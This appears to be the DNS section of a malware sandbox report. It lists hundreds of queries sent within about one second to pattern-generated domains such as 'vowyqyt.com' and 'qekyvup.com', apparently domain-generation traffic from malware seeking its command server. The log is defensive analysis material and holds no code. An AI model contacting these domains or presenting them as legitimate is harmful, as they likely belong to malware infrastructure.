                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.600635052 CET192.168.2.61.1.1.10xa2abStandard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.601629019 CET192.168.2.61.1.1.10x53b2Standard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.610416889 CET192.168.2.61.1.1.10x361bStandard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.615540981 CET192.168.2.61.1.1.10x3f8dStandard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.625642061 CET192.168.2.61.1.1.10xbc09Standard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.631006956 CET192.168.2.61.1.1.10x10feStandard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.631993055 CET192.168.2.61.1.1.10x918fStandard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.643975973 CET192.168.2.61.1.1.10x6efStandard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.649893999 CET192.168.2.61.1.1.10x4ec9Standard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.650563955 CET192.168.2.61.1.1.10x8ed0Standard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.651367903 CET192.168.2.61.1.1.10x43aeStandard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.651726961 CET192.168.2.61.1.1.10x4a4bStandard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.656876087 CET192.168.2.61.1.1.10x2931Standard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.660707951 CET192.168.2.61.1.1.10xbbc6Standard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.663459063 CET192.168.2.61.1.1.10x9da4Standard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.665916920 CET192.168.2.61.1.1.10xc0dcStandard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.666281939 CET192.168.2.61.1.1.10xb2eStandard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.666378021 CET192.168.2.61.1.1.10xf2b4Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.666510105 CET192.168.2.61.1.1.10x3e8cStandard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.666995049 CET192.168.2.61.1.1.10x8d1bStandard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667071104 CET192.168.2.61.1.1.10x6722Standard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667223930 CET192.168.2.61.1.1.10x8f06Standard query (0)qekysel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667272091 CET192.168.2.61.1.1.10x2431Standard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667408943 CET192.168.2.61.1.1.10xea5cStandard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667500019 CET192.168.2.61.1.1.10xeac1Standard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667630911 CET192.168.2.61.1.1.10x5d64Standard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667748928 CET192.168.2.61.1.1.10x8b4eStandard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.667803049 CET192.168.2.61.1.1.10x87bdStandard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.668469906 CET192.168.2.61.1.1.10x5cdfStandard query (0)pujypal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.668544054 CET192.168.2.61.1.1.10xeb80Standard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.669047117 CET192.168.2.61.1.1.10x661aStandard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.669089079 CET192.168.2.61.1.1.10x872dStandard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.669281006 CET192.168.2.61.1.1.10xb2ccStandard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.669294119 CET192.168.2.61.1.1.10xe56bStandard query (0)qebyniv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.669821024 CET192.168.2.61.1.1.10x551fStandard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.670125008 CET192.168.2.61.1.1.10x30e9Standard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.672384977 CET192.168.2.61.1.1.10x41b6Standard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.743690968 CET192.168.2.61.1.1.10x750dStandard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.784373045 CET192.168.2.61.1.1.10x2542Standard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.786169052 CET192.168.2.61.1.1.10x543dStandard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.786426067 CET192.168.2.61.1.1.10x1c12Standard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.790730000 CET192.168.2.61.1.1.10xddf8Standard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.791868925 CET192.168.2.61.1.1.10xbdc0Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.791919947 CET192.168.2.61.1.1.10x6c7bStandard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.792515993 CET192.168.2.61.1.1.10xd465Standard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.793056011 CET192.168.2.61.1.1.10xff3dStandard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.793256998 CET192.168.2.61.1.1.10xc297Standard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.793782949 CET192.168.2.61.1.1.10x4aa7Standard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.794481993 CET192.168.2.61.1.1.10x1a1eStandard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.795114994 CET192.168.2.61.1.1.10x9eddStandard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.795114994 CET192.168.2.61.1.1.10xd4eStandard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.795332909 CET192.168.2.61.1.1.10x3a9aStandard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.795732975 CET192.168.2.61.1.1.10x794fStandard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.796230078 CET192.168.2.61.1.1.10x3075Standard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.796538115 CET192.168.2.61.1.1.10x38a5Standard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.797743082 CET192.168.2.61.1.1.10xcbcStandard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.797743082 CET192.168.2.61.1.1.10x28eeStandard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.798877001 CET192.168.2.61.1.1.10x909fStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.802298069 CET192.168.2.61.1.1.10x864eStandard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.805553913 CET192.168.2.61.1.1.10x572aStandard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.810758114 CET192.168.2.61.1.1.10x91e1Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.810889959 CET192.168.2.61.1.1.10xa0c3Standard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.810983896 CET192.168.2.61.1.1.10x26deStandard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.811141014 CET192.168.2.61.1.1.10xdb5bStandard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.813178062 CET192.168.2.61.1.1.10x8faaStandard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.822571039 CET192.168.2.61.1.1.10x412fStandard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.824213982 CET192.168.2.61.1.1.10x7d0dStandard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.829044104 CET192.168.2.61.1.1.10xa70eStandard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.891077995 CET192.168.2.61.1.1.10xffb3Standard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.891304970 CET192.168.2.61.1.1.10x66c0Standard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.891304970 CET192.168.2.61.1.1.10x62e3Standard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.905599117 CET192.168.2.61.1.1.10xe03Standard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.905925035 CET192.168.2.61.1.1.10xbc19Standard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.912528038 CET192.168.2.61.1.1.10x7960Standard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.912803888 CET192.168.2.61.1.1.10x42c7Standard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.913223028 CET192.168.2.61.1.1.10x9118Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.913480043 CET192.168.2.61.1.1.10xc1d4Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.913669109 CET192.168.2.61.1.1.10xd8a1Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.913810968 CET192.168.2.61.1.1.10x357Standard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.913934946 CET192.168.2.61.1.1.10xdcddStandard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.914103985 CET192.168.2.61.1.1.10x6b8aStandard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.914402008 CET192.168.2.61.1.1.10x5655Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.916198015 CET192.168.2.61.1.1.10x6771Standard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.916887045 CET192.168.2.61.1.1.10x3512Standard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.920756102 CET192.168.2.61.1.1.10x7270Standard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.920908928 CET192.168.2.61.1.1.10x624bStandard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.921113968 CET192.168.2.61.1.1.10x59f2Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.924185991 CET192.168.2.61.1.1.10xb230Standard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.924339056 CET192.168.2.61.1.1.10x1eeStandard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.924525023 CET192.168.2.61.1.1.10x1f27Standard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.924673080 CET192.168.2.61.1.1.10x259bStandard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.925576925 CET192.168.2.61.1.1.10x7153Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.925825119 CET192.168.2.61.1.1.10x8411Standard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.926532984 CET192.168.2.61.1.1.10x5789Standard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.927221060 CET192.168.2.61.1.1.10x2629Standard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.927222013 CET192.168.2.61.1.1.10x97caStandard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.927551031 CET192.168.2.61.1.1.10x9fc0Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.932332039 CET192.168.2.61.1.1.10x2942Standard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.932332039 CET192.168.2.61.1.1.10x7d88Standard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.945259094 CET192.168.2.61.1.1.10xbefStandard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.945724010 CET192.168.2.61.1.1.10xae77Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.948055029 CET192.168.2.61.1.1.10x576fStandard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.155175924 CET192.168.2.61.1.1.10x559eStandard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.155508995 CET192.168.2.61.1.1.10xa8bbStandard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.157488108 CET192.168.2.61.1.1.10xe0c3Standard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.157803059 CET192.168.2.61.1.1.10xfd8bStandard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.159032106 CET192.168.2.61.1.1.10xb1e5Standard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.159341097 CET192.168.2.61.1.1.10x133eStandard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.162229061 CET192.168.2.61.1.1.10x5f2fStandard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.163660049 CET192.168.2.61.1.1.10x98dcStandard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.179685116 CET192.168.2.61.1.1.10xf8cbStandard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.182977915 CET192.168.2.61.1.1.10x8d9Standard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.183232069 CET192.168.2.61.1.1.10xba8Standard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.183654070 CET192.168.2.61.1.1.10xb8aeStandard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.184726954 CET192.168.2.61.1.1.10x20b7Standard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.185482025 CET192.168.2.61.1.1.10xff6cStandard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.185816050 CET192.168.2.61.1.1.10xec4bStandard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.189827919 CET192.168.2.61.1.1.10x8e00Standard query (0)lymyfyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.195554972 CET192.168.2.61.1.1.10x7fb0Standard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.204651117 CET192.168.2.61.1.1.10x5995Standard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.207564116 CET192.168.2.61.1.1.10x9f43Standard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.208877087 CET192.168.2.61.1.1.10x5eb5Standard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.213505983 CET192.168.2.61.1.1.10xd4d7Standard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.223346949 CET192.168.2.61.1.1.10xb37Standard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.225126982 CET192.168.2.61.1.1.10x12aeStandard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.246642113 CET192.168.2.61.1.1.10xd396Standard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.246670008 CET192.168.2.61.1.1.10x6940Standard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.246995926 CET192.168.2.61.1.1.10x41dStandard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.247319937 CET192.168.2.61.1.1.10x8aa7Standard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.247374058 CET192.168.2.61.1.1.10x7a08Standard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.247469902 CET192.168.2.61.1.1.10x6a0cStandard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.247606993 CET192.168.2.61.1.1.10xbb25Standard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.247734070 CET192.168.2.61.1.1.10x8b75Standard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248193979 CET192.168.2.61.1.1.10x530bStandard query (0)galyzus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248210907 CET192.168.2.61.1.1.10xc316Standard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248308897 CET192.168.2.61.1.1.10x96c1Standard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248399019 CET192.168.2.61.1.1.10xb1d4Standard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248588085 CET192.168.2.61.1.1.10xe44eStandard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248800039 CET192.168.2.61.1.1.10xf82Standard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.248989105 CET192.168.2.61.1.1.10xc2efStandard query (0)qebysaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.251764059 CET192.168.2.61.1.1.10xe9e9Standard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.252176046 CET192.168.2.61.1.1.10x2eddStandard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.252784967 CET192.168.2.61.1.1.10xb5e4Standard query (0)vopymit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.254148960 CET192.168.2.61.1.1.10x9bb4Standard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.254878998 CET192.168.2.61.1.1.10x4844Standard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.255513906 CET192.168.2.61.1.1.10x10bcStandard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.256302118 CET192.168.2.61.1.1.10x5c8fStandard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.267891884 CET192.168.2.61.1.1.10xe36Standard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.270812988 CET192.168.2.61.1.1.10x89eStandard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.279575109 CET192.168.2.61.1.1.10x694Standard query (0)qedyqal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.280165911 CET192.168.2.61.1.1.10x2407Standard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.285737038 CET192.168.2.61.1.1.10x8af3Standard query (0)vowyguf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.286855936 CET192.168.2.61.1.1.10x772aStandard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.303428888 CET192.168.2.61.1.1.10x1035Standard query (0)qedyhiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.303714037 CET192.168.2.61.1.1.10x4ed1Standard query (0)qekyryp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.303916931 CET192.168.2.61.1.1.10x3379Standard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.305082083 CET192.168.2.61.1.1.10xf864Standard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.305301905 CET192.168.2.61.1.1.10xd46bStandard query (0)lysygij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.346206903 CET192.168.2.61.1.1.10xb0a7Standard query (0)vonycaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.351659060 CET192.168.2.61.1.1.10x1f65Standard query (0)galyryz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.356245041 CET192.168.2.61.1.1.10x220dStandard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.356313944 CET192.168.2.61.1.1.10x2fcfStandard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.363262892 CET192.168.2.61.1.1.10x687eStandard query (0)volyrut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.365959883 CET192.168.2.61.1.1.10x25e7Standard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.366373062 CET192.168.2.61.1.1.10xc103Standard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.389991045 CET192.168.2.61.1.1.10xeef4Standard query (0)pumycav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.457942963 CET192.168.2.61.1.1.10x573cStandard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.460469961 CET192.168.2.61.1.1.10x94c7Standard query (0)pujywep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.465318918 CET192.168.2.61.1.1.10x8ef0Standard query (0)gatyfuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.466861963 CET192.168.2.61.1.1.10xefc3Standard query (0)lyvyxin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.469060898 CET192.168.2.61.1.1.10xcae1Standard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.470403910 CET192.168.2.61.1.1.10x56dStandard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.471631050 CET192.168.2.61.1.1.10x8051Standard query (0)gahyqas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.472618103 CET192.168.2.61.1.1.10x484fStandard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.473427057 CET192.168.2.61.1.1.10xba71Standard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.473958015 CET192.168.2.61.1.1.10x358Standard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.474251032 CET192.168.2.61.1.1.10xd215Standard query (0)qegyqov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.474555016 CET192.168.2.61.1.1.10xec23Standard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.475698948 CET192.168.2.61.1.1.10x3917Standard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.478059053 CET192.168.2.61.1.1.10xbbc5Standard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.479989052 CET192.168.2.61.1.1.10xc7d2Standard query (0)lysyfed.comA (IP address)IN (0x0001)false
